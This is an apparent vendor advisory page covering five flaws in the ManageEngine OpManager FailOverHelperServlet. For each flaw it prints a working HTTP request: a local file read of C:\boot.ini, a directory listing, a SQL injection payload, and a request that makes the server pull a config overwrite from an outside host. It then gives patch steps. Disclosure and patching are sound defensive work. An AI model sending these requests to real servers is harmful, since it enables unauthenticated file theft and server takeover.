Vulnerabilities in FailOverHelperServlet
>> Technical details:
The affected servlet is the "FailOverHelperServlet" or if you prefer
FailServlet.
It is possible to hijack the failover operation completely.
#1
Vulnerability: Local file include
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory
and its children
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
#4
Vulnerability: Database configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
This will cause the server to make a request to
http://192.168.56.101/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServletcopy?operation=copyfile&fileName=bla
in exactly the same as vulnerability #1. The file will then overwrite
./conf/database_params.conf
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla
#5
Vulnerability: License configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Note that you can only overwrite the license file with another valid
license and do not control the path. So it's a very very low risk
vulnerability (if it can be called that).
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile
We have patch for these vulnerabilities for build 11400.
Steps to apply the patch.
1. Stop the OpManager Service.
2. Take the backUp of <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
2. Take the backUp of <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
3. Extract the attached zip under <OpManager home>
It will extract the patch under WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
4)Stop and Start Opmanager.
New to ADSelfService Plus?
Related Articles
Vulnerabilities in OpManager 12.0
VULNERABILITY DETAILS(found in build 12000) Vulnerability 1: Unrestricted File Upload: OpManager fails to validate or improperly validates files before uploading to the system. As a result an attacker might be able to upload arbitrary JSP file and ...Servlet Vulnerability Fix
This fix is compatible only for build 11300(OpManager and Social IT Plus). Please follow these steps. 1)Download the attached zip file and extract it under /OpManager 2)Stop and Start OpManager Note: This zip file contains the fix for these ...